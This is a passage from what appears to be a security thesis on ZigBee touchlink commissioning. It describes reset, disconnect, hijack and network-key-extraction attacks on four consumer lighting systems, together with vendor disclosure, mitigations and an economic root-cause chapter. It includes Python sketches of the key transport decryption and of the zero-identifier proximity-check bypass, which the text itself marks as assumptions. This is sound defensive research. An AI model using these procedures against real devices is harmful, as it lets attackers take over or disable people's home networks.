Procedure. The attack is performed by sending a reset to factory new request inter-PAN command frame after a prior active device scan. The payload of the reset to factory new request only contains the transaction identifier. On the reception of a valid reset to factory new request, the light bulb discards its current configuration, and its color and brightness change to the default states.

Evaluation. Our evaluation showed that all four lighting systems are vulnerable to the reset to factory-new attack. Interestingly, we are also able to reset the Lightify gateway (at any time) as well as the Philips Hue bridge (if the button of the bridge was pushed within the last 30 seconds) to a factory-new state. After a reset to factory-new attack, the legitimate user would have to reintegrate the bulb into the legitimate network by either searching for new devices via the mobile device app or by using a remote control. This operation has to be initiated manually by the user. In the meantime, i.e., before the user initiates a recommissioning, an attacker has the chance to hijack the reset device using the classical commissioning in ZigBee Light Link or EZ-Mode commissioning in ZigBee 3.0, each in combination with the publicly known default global Trust Center link key as demonstrated in [337, 248].


Permanent Disconnect Attack. In the permanent disconnect attack, the user loses control over the touchlink-enabled device. This attack differs from the reset to factory-new attack in the process of recovery: after a reset to factory-new attack, the user can simply recommission the attacked bulb to the network again. In the aftermath of a permanent disconnect attack, the user needs to recover the bulb first, as described in Section 5.4.6, before a recommissioning to the legitimate network is possible again.

Procedure. We present two approaches to perform a permanent disconnect attack: In the first approach, we force a targeted ZigBee device to change the current channel to another channel determined by the attacker. In the second approach, we join the targeted device to a non-existent network.

A change of the wireless channel can be enforced by sending a network update request inter-PAN command frame. The command must include a network update identifier that is higher than the current update identifier of the targeted network, which is a counter that is incremented each time the network settings are updated. The current network update identifier can be retrieved from the scan response of the target device. After receiving the network update request, which includes the new channel, the target device switches to this channel. The legitimate network does not recognize the shift. As a consequence, the targeted device does not receive legitimate user commands anymore.

Using a network join end device request inter-PAN command frame (instead of the network update request), an attacker can manipulate additional network settings like the PAN ID and the current network key. The attacker sets the encrypted network key field to an arbitrary 128-bit value and then sends the network join end device request to the targeted ZigBee device. On the reception of a network join end device request, the ZigBee device leaves its current network and sets the internal parameters according to the new configuration. Since the encryption of the network key is not authenticated, the device decrypts the arbitrary 128-bit value to a garbage network key, which also is not known to the attacker. The transaction is confirmed by sending a network join end device response.

Evaluation. In our evaluation, all four presented lighting systems are vulnerable to both permanent disconnect attacks. These attacks change neither the color nor the state of the bulb, but after performing the attack procedures, the targeted bulbs cannot be controlled by the legitimate user anymore.

5.4.4 Attacks to Gain Control

The authenticity and integrity of the ZigBee touchlink commissioning procedure rely on the touchlink preconfigured link key, also denoted as ZLL master key in the ZigBee Light Link specifications, which is used to encrypt the current network key before this key is transmitted to the joining device. The procedure of the network key encryption starts

by expanding the transaction identifier and the response identifier from the scan request and scan response, respectively, to a 128-bit string. This bit string is the input to the AES encryption function, while the touchlink preconfigured link key is used as encryption key. The resulting output is denoted as transport key. In the next step, the actual network key is encrypted with the transport key, again using AES encryption. The touchlink preconfigured link key is distributed to manufacturers of ZigBee-certified products under an NDA. However, in March 2015, the touchlink preconfigured link key was leaked on Twitter4. In the following, we present attack procedures in which the knowledge of the touchlink preconfigured link key is leveraged to take full control over ZigBee networks.
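The following sketch implements this key transport scheme with the Python 'cryptography' package. Two details are assumptions on our part and are hedged accordingly: both steps are modeled as single-block AES in ECB mode, and the 128-bit expansion is modeled as the 32-bit transaction identifier and response identifier concatenated twice each in big-endian order. The key constant is a placeholder, not the leaked touchlink preconfigured link key.

```python
# Sketch of the touchlink key transport scheme described above.
# Assumptions: single-block AES-ECB for both steps; 128-bit expansion is
# TrID || TrID || RsID || RsID (big-endian). The key below is a placeholder.
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

TOUCHLINK_PRECONFIGURED_LINK_KEY = bytes(16)     # placeholder 128-bit key

def expand_identifiers(transaction_id: int, response_id: int) -> bytes:
    tid = transaction_id.to_bytes(4, "big")
    rid = response_id.to_bytes(4, "big")
    return tid + tid + rid + rid                 # 128-bit input block

def aes_ecb(key: bytes, block: bytes, decrypt: bool = False) -> bytes:
    cipher = Cipher(algorithms.AES(key), modes.ECB())
    ctx = cipher.decryptor() if decrypt else cipher.encryptor()
    return ctx.update(block) + ctx.finalize()

def transport_key(transaction_id: int, response_id: int) -> bytes:
    # Transport key = AES(preconfigured link key, expanded identifiers).
    return aes_ecb(TOUCHLINK_PRECONFIGURED_LINK_KEY,
                   expand_identifiers(transaction_id, response_id))

def encrypt_network_key(network_key: bytes, transaction_id: int,
                        response_id: int) -> bytes:
    # Network key is encrypted under the transport key (hijack direction).
    return aes_ecb(transport_key(transaction_id, response_id), network_key)

def decrypt_network_key(encrypted: bytes, transaction_id: int,
                        response_id: int) -> bytes:
    # Inverse operation used for network key extraction.
    return aes_ecb(transport_key(transaction_id, response_id), encrypted,
                   decrypt=True)
```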

Hijack Attack. The hijack attack extends the permanent disconnect attack described in Section 5.4.3. Instead of sending arbitrary bytes as the encrypted network key, the attacker forces the ZigBee device to use an attacker-chosen network key.

Procedure. Again, the attacker builds the network join end device request inter-PAN command frame as described in Section 5.4.3. The attacker-chosen network key is encrypted using the leaked touchlink preconfigured link key, the transaction identifier from the scan request, and the response identifier from the scan response of the targeted device. This encrypted network key is included in a network join end device request and sent to the targeted device. On the reception of a network join end device request, the device updates its internal parameters according to the received values and confirms the transaction by sending a network join end device response. The targeted device is now commissioned to the network of the attacker, who has full control over this device.

Evaluation. In the evaluation, we were able to force ZigBee devices of all four connected lighting systems to accept an attacker-chosen network key. This attack paves the way to send further application-specific commands to the targeted devices.

Network Key Extraction. An attacker is able to extract the current network key by eavesdropping on the scan response and the network join end device request5 of an initial touchlink commissioning. All these command frames must belong to the same transaction, i.e., contain the same transaction identifier.

Procedure. The legitimate user can be motivated to perform a touchlink commissioning procedure as a result of a prior reset to factory-new attack. Then, the user is forced

4 https://twitter.com/mayazigbee
5 Instead of capturing the network join end device request, this attack can also be performed by capturing a network join router request or a network start request.

to commission the node to the legitimate network again. After eavesdropping on the encrypted network key from the network join end device request, the network key is decrypted using the leaked touchlink preconfigured link key. The response identifier is known from the scan response, while the transaction identifier is included in all packets belonging to the same transaction.
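Using the key transport sketch shown earlier in Section 5.4.4, the extraction step reduces to a single decryption of the eavesdropped value; the numbers below are made-up examples, not real captures.

```python
# Usage of the decrypt_network_key sketch from above with eavesdropped values.
# All values here are made-up examples.
transaction_id = 0x11223344      # from the eavesdropped scan request/response
response_id = 0x55667788         # from the eavesdropped scan response
encrypted_key = bytes.fromhex("00112233445566778899aabbccddeeff")

network_key = decrypt_network_key(encrypted_key, transaction_id, response_id)
print(network_key.hex())
```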

Evaluation. For this attack, the legitimate user of a connected lighting system has to perform the touchlink commissioning procedure. Our investigations conclude that the Philips Hue and the IKEA Trådfri lighting systems can be targeted with this attack since a few Philips Hue third-party apps as well as the IKEA Trådfri remote control trigger touchlink commissioning. To the best of our knowledge, there exist neither apps nor ZigBee-certified devices by Osram or GE that can initiate the touchlink commissioning procedure. In our evaluation, we showed that all four lighting systems can be controlled once the network key is exposed. We were able to send commands to turn the bulbs on and off and to change the light color of the Philips Hue bulbs to any arbitrary color.

5.4.5 Evaluation of Wireless Range

In the ZigBee specification, manufacturers are advised to limit the wireless range of touchlink commands such that only ZigBee devices in close proximity are able to perform the touchlink commissioning procedure. This limitation, denoted as proximity check, should be implemented such that touchlink commands are only accepted if the received signal strength of the initiator device is above a certain threshold. To get a baseline for our attacks, we measured the maximum distance at which the touchlink commissioning procedure can be performed successfully with a Philips Hue bridge, since the Osram Lightify gateway and the GE Link hub provide no possibility to trigger the touchlink commissioning procedure. The maximum distance to successfully commission a Hue bulb or a Link bulb to the Hue bridge is 1.8 meters, and 1.6 meters for a Lightify bulb. For IKEA Trådfri, the maximum distance to trigger the touchlink commissioning procedure between the remote control and a bulb is 1.5 meters. Since the touchlink commissioning procedure is intended to require close proximity, we investigated whether the attacks work over longer distances. We set up an outdoor testbed on a sports ground with a line-of-sight between the USRP and the attacked bulbs. At the USRP, we mounted rod antennas with 8 dB gain according to the manufacturer. The setup is shown in Figure 5.5. We decided on an outdoor measurement with line-of-sight between the attack equipment and the target device since it is hard to make general statements about the wireless range of these attacks through buildings. The propagation of radio waves depends on many variables, e.g., the ground plan (reflections), structure and thickness of walls, wall openings, electrical installations, as well as interference with other deployed wireless networks. Thus,


(a) Evaluated light bulbs. (b) Attacker equipment.

Figure 5.5: Outdoor testbed to measure the maximum distance of successfully attacking a ZigBee-certified device.

we conducted outdoor measurements eliminating as many types of distortions as possible and thus providing ‘ground truth’ for further investigations.

Table 5.3: Maximum ranges of an active attack in our evaluation.
                                        Active attack range
System            Legitimate range      Regular        Disclosed bug
Philips Hue       1.8 m                 36 m           (patched)
Osram Lightify    1.6 m                 15 m           >190 m
GE Link           1.8 m                 28 m           >190 m
IKEA Trådfri      1.5 m                 >190 m         >190 m

Active attacks. In the evaluation of the active attacks, we measured the maximum distance from which we are able to trigger an identify action attack, as described in Section 5.4.3. The identify action attack requires passing the proximity check and receiving a response from the targeted node, and is therefore representative of active attacks. The results are shown in Table 5.3. The maximum distance for successfully attacking the Osram Lightify system is 15 meters, the maximum distance for the GE Link system is 28 meters, and the maximum distance for the Philips Hue system is 36 meters. These distances depend on the noise of the channel as well as the orientation of the bulbs and the antennas of the USRP. We experimented with different gain and antenna settings and also with different positions and orientations of the bulbs. From our measurement results, we estimate that the received signal strength of inter-PAN command frames has to be stronger than -40 dBm. We also measured the maximum distance to perform the same attack on IKEA Trådfri bulbs. In our evaluation, we were able to trigger the identify action attack from a distance

of more than 190 meters. This was the maximum measurable distance due to space restrictions of the outdoor testbed. Since the range to actively attack an IKEA Trådfri bulb is much larger than for the other systems, we assume that the proximity check is not enforced. For all these tests, the transaction identifier was chosen randomly. Previous work [248] disclosed a bug in the ZigBee Light Link implementation of Philips Hue, in which the proximity check can be circumvented by setting the transaction identifier of the touchlink command to zero. This bug was patched by Philips in October 2016. In our evaluation, we confirmed that the same bug also affects Osram Lightify, GE Link, and IKEA Trådfri. We were able to trigger the identify action attack from the maximum measurable distance of 190 meters for each of these systems. Again, we assume that this distance could be extended further.
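The following is a purely illustrative sketch, not vendor code, of how a receiver-side proximity check with the reported bug might behave: commands whose transaction identifier is zero bypass the RSSI threshold entirely. The -40 dBm threshold is our estimate from the measurements above, and the structure of the check is an assumption.

```python
# Illustrative sketch of a buggy proximity check (not actual vendor firmware).
RSSI_THRESHOLD_DBM = -40   # estimated from our measurements

def accept_touchlink_command(rssi_dbm: float, transaction_id: int,
                             buggy: bool = True) -> bool:
    if buggy and transaction_id == 0:
        # Bug reported in [248] and confirmed above for further systems:
        # a zero transaction identifier skips the proximity check.
        return True
    return rssi_dbm >= RSSI_THRESHOLD_DBM
```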

Passive attacks. We also evaluated the ranges of passively eavesdropping on the touchlink commissioning procedure to extract the current network key. We were able to extract the network key that was established using an IKEA Trådfri system, consisting of a bulb and a remote control, from a distance of 42 meters. In addition, we extracted the network key established between a Philips Hue bridge and a Philips Hue bulb from a distance of 130 meters. We did not evaluate the Osram Lightify and GE Link systems since they do not provide an interface for consumers to trigger the touchlink commissioning procedure.

5.4.6 Recovery

The recovery from an identify action attack or a reset to factory-new attack is easy to accomplish: for the identify action attack, the user has to disconnect the node from the power source and reconnect it again. For the reset to factory-new attack, the user needs to rejoin the node to the network. Recovering from permanent disconnect and hijack attacks, which alter the configuration of the nodes, is more challenging, but all evaluated lighting systems possess functions to regain control over the attacked devices. However, these procedures are not obvious at first sight. In any case, a recovery entails manual effort for the user, as we explain below. For GE Link, Osram Lightify, and IKEA Trådfri, the only way to recover the attacked bulbs is a physical reset. The physical reset is not specified in the ZigBee Light Link standard6, but can be achieved by powering the bulbs on and off in a certain manufacturer-specific pattern, e.g., an Osram Lightify A60 bulb must be turned on for 3 seconds and off for 5 seconds, and this procedure must be repeated five times. This is a cumbersome task and might not be successful at the first try. Since the physical reset mechanisms are not obvious, either a mobile device app (GE Link, Osram Lightify) or a manual (IKEA Trådfri) guides the process of performing a physical reset. The Philips Hue system lacks a physical reset, to

6 The ZigBee 3.0 specifications recommend supporting a reset via local action in a manufacturer-specific fashion.

the best of our knowledge. However, the Hue system supports an additional commissioning mechanism, manual search, which is not specified in any ZigBee standard. Manual search works by entering a code that is printed on a bulb into the Hue app. The manual search fails if the channel of the attacked device was altered to a secondary channel. Touchlink commissioning can be applied as an alternative recovery procedure for Philips Hue and IKEA Trådfri bulbs. However, the IKEA Trådfri remote control does not search on secondary channels; therefore, if the channel of a bulb was changed to a secondary channel, it must be reset before recommissioning. In Philips Hue, touchlink commissioning can be performed by using either the Hue API debug tool or a third-party app. After the recommissioning with touchlink, an interesting effect can be observed: instead of reintegrating the attacked bulb into the former network, the Philips Hue bridge detects that the network update identifier of the discovered device is higher than its own. The Hue bridge adapts to the ‘latest’ network settings and switches to the attacker-defined channel. Consequently, the bridge loses the connection to all other bulbs, which remain on the former channel. Afterwards, all other bulbs of the former network have to be recommissioned to the new network using touchlink. This is a time-consuming task because all devices have to be moved into close proximity (1-2 meters) of the Hue bridge in order to perform the touchlink commissioning.

5.5 Disclosure and Response

We reported the results of this security analysis to GE, IKEA, Philips, Osram, and the ZigBee Alliance. The manufacturers IKEA, Philips, and Osram responded to our outreach. In contrast, the GE Product Security Incident Response Team confirmed the reception of our notification but did not comment on our report. Osram discussed mitigation strategies for the reported weaknesses with us. A firmware update, which was rolled out in July 2017, patched the bug in the proximity check and put touchlink commissioning under application control. This way, touchlink commissioning is only activated in new Lightify products if the user turns the device on and off in a specific pattern. Also in response to our report, IKEA was cooperating with its stack vendor to deliver a patch (as of July 2017). We discussed the results of our security analysis with representatives and members of the ZigBee Alliance and received their feedback that the analysis is accurate and complete. According to the ZigBee Alliance, the main reason for the development of touchlink was to reduce the complexity of the commissioning procedure for ZigBee Pro devices. Touchlink offered a low entry barrier for consumers to set up connected lighting systems that are configured via remote controls. However, at the same time as the ZigBee Light Link standard was developed (2010–2012), the popularity of smartphones increased rapidly. Because of this development, the ZigBee Alliance decided to introduce a bridge device that translates TCP/IP traffic sent by smartphones into ZigBee commands, thus simplifying

the handling of the classical ZigBee commissioning procedure and providing an alternative method to overcome the complexity of commissioning.

5.6 Discussion

Summarizing the results of the security analysis, we can see that all tested ZigBee-certified products are vulnerable to passive and active attacks. An attacker is able to thwart the availability of and take complete control over any touchlink-enabled device. It is irrelevant whether the targeted ZigBee network was set up using touchlink or another commissioning procedure. Furthermore, we showed that close proximity is not required. In our evaluation, we successfully performed active attacks from distances between 15 and 190 meters, depending on the targeted product. Also, we were able to passively eavesdrop on the touchlink commissioning procedure from distances between 42 and 130 meters. We assume that these distances could be further extended if the attacker uses directional antennas. We tested four different ZigBee-certified connected lighting systems that implement the ZigBee Light Link standard. Since the touchlink commissioning procedure in ZigBee 3.0 has not been changed compared to ZigBee Light Link, all presented attacks also apply to arbitrary ZigBee 3.0 products that enable touchlink commissioning. In summary, we state that all three threat scenarios outlined in Section 5.3.2 are realistic and exploit security weaknesses that exist by design. In addition, we found that the recovery of attacked devices is quite a cumbersome task.

Usage of touchlink. Since touchlink commissioning is an optional feature in ZigBee 3.0, we recommend disabling this commissioning option in all future ZigBee products. Already a single touchlink-enabled device in the network can expose the network key and thus compromise the security of the other nodes. In our communication with the ZigBee Alliance, they suggested putting the enabling of the touchlink features under application control, for example enabling touchlink only for a few minutes after power-up. Although this restriction limits the vulnerability time frame, users can be motivated by social engineering techniques to power up devices at predictable times. For example, jamming of ZigBee communication may motivate consumers to disconnect a device from the power source and power it up again. Furthermore, the recommendation of putting touchlink commissioning under application control is not included in the specifications, so it is not clear how manufacturers should become aware of it.

Manufacturer-specific mitigation. No immediate mitigation of the attacks presented in Section 5.4 is possible since the security weaknesses result from legitimate features in the specification, especially from the concept of unauthenticated inter-PAN frames. If touchlink commissioning is required, manufacturer-specific changes can be made to contain the effects of the attacks. For example, the identify action should be limited to a reasonable duration (as in the IKEA Trådfri implementation), which would decrease the impact of the identify action attack significantly.
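A minimal sketch of such a duration-clamping mitigation follows; the 60-second cap mirrors the maximum observed for IKEA Trådfri in Table 5.2 and is an example value, not a normative recommendation.

```python
# Minimal sketch of clamping the identify duration on the device side.
MAX_IDENTIFY_SECONDS = 60   # example cap, matching the Trådfri observation

def clamp_identify_duration(requested: int) -> int:
    # 0x0000 aborts a running identify action and 0xFFFF selects the
    # device-specific default; both special values are passed through.
    if requested in (0x0000, 0xFFFF):
        return requested
    return min(requested, MAX_IDENTIFY_SECONDS)
```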


Renewal of the touchlink preconfigured link key. Since the touchlink preconfigured link key was leaked in March 2015, the touchlink commissioning procedure is considered compromised. On the one hand, the replacement of the touchlink preconfigured link key would prevent the attacks presented in Section 5.4.4, and therefore protect against take-over attacks in which the attacker gains control over the targeted devices. On the other hand, the renewal of this key would render the integration of ZigBee Light Link-based connected lighting systems and complementary equipment into ZigBee 3.0 networks impossible. This would most likely lead to public resentment, as the following incident illustrates. In December 2015, an update of the Hue app by Philips locked out light bulbs of other vendors if these vendors did not participate in the ‘Friends of Hue’ certification program. The public outcry made Philips revert this decision after a few days by providing an unscheduled update [235]. In addition to compatibility problems, the non-disclosure of a renewed key cannot be guaranteed since the current touchlink preconfigured link key was also protected by an NDA but leaked anyway.

EZ-Mode Commissioning. EZ-Mode commissioning is an alternative commissioning procedure supported by all ZigBee 3.0 products. This commissioning procedure relies neither on inter-PAN frames nor on a proximity check. Therefore, the attack procedures described in Section 5.4 cannot be adapted to it. EZ-Mode commissioning offers three options for securing the network key transport. In centralized security networks, the network key transport can be protected either by the publicly known default global Trust Center link key or by a link key derived from an install code. In distributed security networks, the network key transport is encrypted using the NDA-protected distributed security global link key. All three EZ-Mode commissioning options have serious drawbacks in terms of security and usability. Using the default global Trust Center link key makes networks susceptible to attack scenarios where users are forced (e.g., by jamming) to recommission a node to the network in the presence of the attacker. In this case, the attacker would be able to recover the network key by eavesdropping on the commissioning procedure. Using the NDA-protected distributed security global link key is only secure as long as the key is not leaked. Thus, in the long run, the install code option is the only EZ-Mode commissioning option that is secure against the local attacker model described in Section 5.3.2. We note, however, that this option requires extra effort from the users in terms of scanning (or entering) the install code using a mobile device app. This might constitute a serious usability problem, especially if already installed devices have to be recommissioned. For example, this can happen if a broken coordinator node has to be replaced. If the devices are difficult to reach, e.g., bulbs installed on the ceiling, the recommissioning might become quite cumbersome.

Limitations of our work. The ZigBee 3.0 specifications [330, p. 64] warn against supporting the touchlink command to join an end device to an existing centralized security network, which means that the hijack attack and the network key extraction possibly cannot be performed on centralized security networks if manufacturers heed this warning. However,

these attacks work for distributed security networks. All other attacks work for both security network models.

5.7 Related Work on ZigBee Security

The security of the ZigBee standard as well as the underlying IEEE 802.15.4 standard attracted much less attention in the academic research community compared to other wireless standards, such as Wi-Fi, Bluetooth, or mobile telephony. Sastry and Wagner [258] analyzed the security mechanisms of the IEEE 802.15.4 protocol. However, these mechanisms are not used in ZigBee. Wright [315] published the penetration testing tool KillerBee, which allows sniffing and analyzing traffic of ZigBee and other IEEE 802.15.4-based networks. Wright also exposed that the network key of the then-current ZigBee standard was sent in clear text over the air. He demonstrated successful replay attacks using previously captured ZigBee traffic. The ZigBee Pro specification, released in 2012, addressed these security weaknesses. Goodspeed et al. [108] developed exploration tools to analyze the wireless attack surface of IEEE 802.15.4 networks. Armknecht et al. [14] presented a formal security model for ZigBee touchlink commissioning. Further papers [224, 301] cover security issues of ZigBee networks, but these papers refer to security weaknesses concerning outdated ZigBee specifications and have not been evaluated with ZigBee-certified products. Since the emergence of connected lighting systems in 2012, these systems have been subject to a number of security investigations. Dhanjani [63] published implementation weaknesses of the command authentication in the Philips Hue lighting system. He discovered that the secret whitelist token, which is required to authenticate the commands sent from the app (or website) to the bridge, is a hash of the MAC address of the controlling device. Chapman [43] obtained the firmware of LIFX light bulbs via a JTAG debugger and extracted cryptographic key material through reverse engineering of the firmware. Heiland [122] exposed vulnerabilities in the Osram Lightify system. Through reverse engineering, he discovered that Wi-Fi credentials are stored in plaintext in the iOS Lightify Home app. Zillner et al. [337] exposed security weaknesses in the ZigBee Pro specification. They showed that ZigBee-based lighting systems use publicly known fallback keys in the classical commissioning procedure for the initial key exchange, which allows the extraction of the network key. Ronen and Shamir [249] used the Philips Lux lighting system, which is the white-color variant of Hue, to build a covert channel for the exfiltration of data from an isolated environment. Also, Ronen et al. [248] exploited an implementation bug in Philips Hue bulbs that allowed them to reset and to control these bulbs from a distance of a few hundred meters. In addition, they extracted cryptographic material, which secured the update process of the bulbs' firmware, from the hardware using correlation power analysis. As a result, Ronen et al. were able to install a manipulated firmware image on Hue bulbs, and discussed the threat of a self-spreading IoT worm. In contrast to related work on connected lighting systems, we do not analyze the products

of a certain manufacturer but investigate the underlying standard. Also, we are the first to investigate the security mechanisms of the latest ZigBee standard, ZigBee 3.0.

5.8 Conclusion

Millions of IoT devices, including security-critical products that should be secured against local attackers, such as door locks and intruder alarm systems, use ZigBee for wireless low-power communication. In this chapter, we investigated the touchlink commissioning procedure, which is a commissioning option in the latest ZigBee specifications, ZigBee 3.0. We performed a security analysis of the touchlink commissioning procedure, in which we described active and passive attacks and evaluated their impact using our penetration testing framework Z3sec. Our results show that attackers can thwart the availability of touchlink-enabled devices and can gain control over all nodes in the network. A single touchlink-enabled ZigBee device is already able to expose the network key to an attacker, and is therefore sufficient to compromise the security of all nodes in the network, no matter how these nodes were added to the network. Thus, we warn against the adoption of touchlink commissioning in future ZigBee 3.0 devices. To prevent these attacks, we recommend that manufacturers of ZigBee-certified products use EZ-Mode commissioning in combination with install codes.


Part II

Economic Perspective

Chapter 6

Root Cause Analysis of ZigBee’s Insecurity

Security economics, which considers decision making in security and privacy based on economic reasoning, plays an important role in the IoT. In this chapter, we investigate how economic motivations negatively influenced the security design of the ZigBee standard, and give recommendations for future business-driven IoT standardization efforts.

Contents

6.1 Introduction
6.2 Background on ZigBee
6.3 Root Cause Analysis
6.3.1 Motivation for Standardization
6.3.2 ZigBee as Case Study on Security Economics
6.4 Implications of Insecure IoT Products
6.5 A Road to Improvement
6.5.1 Define Precise Security Models
6.5.2 Stop Consumer and Business Security Differentiation
6.5.3 Add Membership Level for Academic Institutes
6.5.4 Conduct Security Testing Without Conflict of Interest
6.5.5 Define and Enforce Update Policy
6.6 Related Work on Security Economics in IoT Standardization
6.7 Conclusion

6.1 Introduction

Standardization efforts play a major role in the expansion of the Internet of Things (IoT) as the success of the IoT is driven by interconnecting a multitude of devices, possibly produced by various manufacturers. This requires manufacturers to agree on common communication protocols at the network and application level. Such standardization efforts are mainly fostered by standard developing organizations (SDOs). In recent years, a number of open and market-driven IoT standardization efforts have aimed for market dominance. In the domain of smart home applications, one of the market leaders is the ZigBee standard, maintained by the ZigBee Alliance, a global non-profit SDO. In this chapter, we consider the ZigBee specifications as a case study to derive lessons about security economics in market-driven IoT standardization efforts. We chose ZigBee since a number of

security weaknesses have recently been revealed in its specifications; we discuss how these weaknesses resulted from design choices made during the standardization process. To define a suitable security architecture, it is important to understand the motivations of both sides, security researchers and manufacturers, because former research [9, 11] has concluded that the academic research community has different priorities in securing technologies than vendors and consumers. In fact, the economic perspective is often not considered in security research. Using the lessons from the insecurities of ZigBee as an example, the main goal of this chapter is to improve the understanding on both sides in order to strengthen the security of future IoT standardization efforts. Our contributions are the following: We are the first to analyze the root causes that led to the insufficient security architecture of a popular ZigBee application standard. Learning from the security trade-offs made in these IoT specifications, we provide recommendations on how to strengthen security architectures in future IoT standardization efforts. Our results show that the majority of the revealed attacks, which ultimately allow the complete take-over of the target devices, could have been prevented if particular compromises in the security design had been avoided. We hope that the lessons learned from these security pitfalls raise the attention of manufacturers and SDOs to improve the methodology of defining security measures in future IoT products. Also, our goal is that the research community gains a deeper understanding of the economic priorities in IoT standardization efforts. The remainder of this chapter is organized as follows. We introduce the background on ZigBee and an overview of its disclosed security vulnerabilities in Section 6.2. In Section 6.3, we present priorities and incentives of standardization efforts, and analyze what went wrong in the ZigBee Light Link standardization. We discuss the benefits of specifying secure IoT systems in Section 6.4, and make recommendations that outline a road to improvement in Section 6.5. We present related work in Section 6.6, and conclude in Section 6.7.

6.2 Background on ZigBee

This section summarizes the background on ZigBee and its security vulnerabilities that we described in detail in Chapter 5. ZigBee is an IoT mesh network and application standard maintained by the ZigBee Alliance. Popular IoT applications that implement the ZigBee standard include smart home products and smart meters. The ZigBee Alliance is a non-profit SDO and consists of more than 400 member companies [331]. The first ZigBee specifications were released in 2004. In the early years, the approach of the ZigBee Alliance was to bundle application-specific functionality in separate specifications, denoted as application profiles, to meet the needs of particular applications, e.g., connected lighting systems. This approach led to problems of interoperability between smart home products that should cooperate in a joint network but implement different application profiles. The latest specifications, ZigBee 3.0, which

were publicly released in 2016, aim to unify these profiles into one universal standard. In this work, we focus on the ZigBee Light Link specifications for connected lighting. Although these specifications themselves have been deprecated since 2016, major parts of them were inherited by ZigBee 3.0. In ZigBee, each personal area network (PAN) has its own network key that is shared among all nodes of this network. Implementers of products that follow the ZigBee Light Link specifications can choose between two commissioning procedures to obtain the network key: either classical commissioning or touchlink commissioning. Classical commissioning is suitable if the network is commissioned using a mobile device application and a bridge device. In contrast, touchlink commissioning, which was specifically designed for the needs of connected lighting systems, is utilized for managing a network using a constrained device, such as a remote control. However, a number of security weaknesses have been revealed in both commissioning modes. Zillner and Strobl [337] demonstrated insecurities in the classical commissioning as they exposed that ZigBee-certified products can be forced to encrypt the network key for the over-the-air transmission using a publicly known fallback key. Also, they showed that ZigBee-certified products can be easily reset by sending an unauthenticated reset-to-factory request. In Chapter 5, we analyzed the security of the touchlink commissioning procedure. We showed that this commissioning procedure is insecure by design, allowing attackers to trigger the identify action (e.g., blinking) of ZigBee-certified devices for several hours, and to change their wireless channel (and thus permanently disconnect nodes from their legitimate network) without knowing any key material. In addition, an attacker can passively eavesdrop on the network key and take full control over devices since the master key, which protects the network key during the over-the-air transport, was leaked [293]. We demonstrated these vulnerabilities by evaluating popular ZigBee-certified connected lighting systems. In ZigBee 3.0, the mechanisms of the classical commissioning procedure were merged with novel features, such as link keys derived from an install code that is printed on the product, into the so-called ‘EZ-mode’ commissioning. EZ-mode is only activated for a short period of time after pushing a button on the product. Thus, the attacks demonstrated by Zillner and Strobl [337] are largely contained. Also, the ZigBee 3.0 specifications inherited the touchlink commissioning procedure from the ZigBee Light Link specifications with just small adjustments but without replacing the leaked key. Thus, the threats shown in our previous work [213] also affect all products certified for ZigBee 3.0 that enable the optional touchlink commissioning.

6.3 Root Cause Analysis

The security research community has a different perspective on securing IoT technologies than manufacturers since the economic perspective is often not taken into account.


In this section, we outline priorities and incentives of market-driven standardization efforts and then analyze what went wrong in the standardization of the ZigBee Light Link specifications.1

6.3.1 Motivation for Standardization

Several analyses (e.g., [25, 113, 104]) outline motivations of manufacturers to participate in strategic alliances, which promote the standardization of novel technologies. A first reason for participation is to decrease market uncertainties since the risks are shared among all participating companies [284, 113]. For the innovator, standardization increases the probability that its own technology succeeds, and it prevents other alliance members from developing competitive (proprietary) systems. In the case of the ZigBee Light Link specifications, which define a network and application standard for connected lighting, the ZigBee Alliance started the development of the standard in 2010, with contributions from Philips, Osram, and GE, among others. The ZigBee Light Link technology became a great success since another organization, The Connected Lighting Alliance (TCLA), a non-profit organization promoting the compatibility of wireless lighting, endorsed this standard in July 2013 after studying multiple open standards. A second reason is that members of standardization processes profit from strategic knowledge transfer among alliance members [34]. Since multiple manufacturers contribute their know-how to the standardization efforts, alliance members benefit from knowledge spillover and keep track of the technical knowledge of their potential competitors [256]. According to the ZigBee Alliance, the contribution of intellectual property to their standards by member companies is very common. As an example of knowledge transfer, the touchlink commissioning procedure, intellectual property of Philips [172], was contributed to the ZigBee Light Link specifications. Access to new markets is a third reason for participation in standardization efforts. Alliances provide low entry barriers for entering foreign markets, i.e., markets that a manufacturer has not entered yet [104]. Also, making one's own products compatible with complementary products opens new markets, even for small companies. The ZigBee Light Link standard was developed because members of the ZigBee Alliance saw a promising market. Afterwards, further companies that did not participate in the development of these specifications offered products that complement ZigBee-certified lighting systems, e.g., wireless dimmer switches [35]. To bear the expenses of the organizational overhead of such a strategic alliance, its members are obligated to pay an annual fee. Usually, SDOs offer several levels of membership that differ in the amount of the fee and in privileges: the more financial resources a member contributes to the alliance, the more influence this member has on the alliance's final decisions.

1 The authors are not associated with the ZigBee Alliance. The information presented in this case study was obtained through discussions with officials and members of the ZigBee Alliance, publicly accessible information including specifications, and technical inspections of ZigBee-certified products.


In the case of the ZigBee Alliance, three membership levels are offered: adopter ($4k/year), participant ($9.9k/year), and promoter ($55k/year) [335]. While adopters have access to all final specifications and some group events, only participants and promoters can participate in work groups and propose specifications. Of these, only promoters have the right to finally approve new specifications.

6.3.2 ZigBee as Case Study on Security Economics

From the economic perspective [9, 11], if a standard is aiming for market dominance, then this standard must attract manufacturers of complementary products as well as consumers. These prioritized efforts require substantial resources, and since resources are finite, they tend to be withdrawn from non-functional features, e.g., comprehensive security measures. In the end, a large amount of resources is spent to develop an attractive system, but only few resources are left to make it secure. In fact, security measures may even make it harder for complementors to build complementary products that support this standard. Therefore, in the first phase of an evolving technology, manufacturers tend to ignore security as they expand their market position. Consumers reward manufacturers for adding functional features to products and being first to market. In contrast, the development of an adequate security architecture for these products requires time-consuming testing and might restrict favored functional features. In a later phase, security measures may be added to lock consumers to the products. These two phases can be seen in the ZigBee Light Link standard.

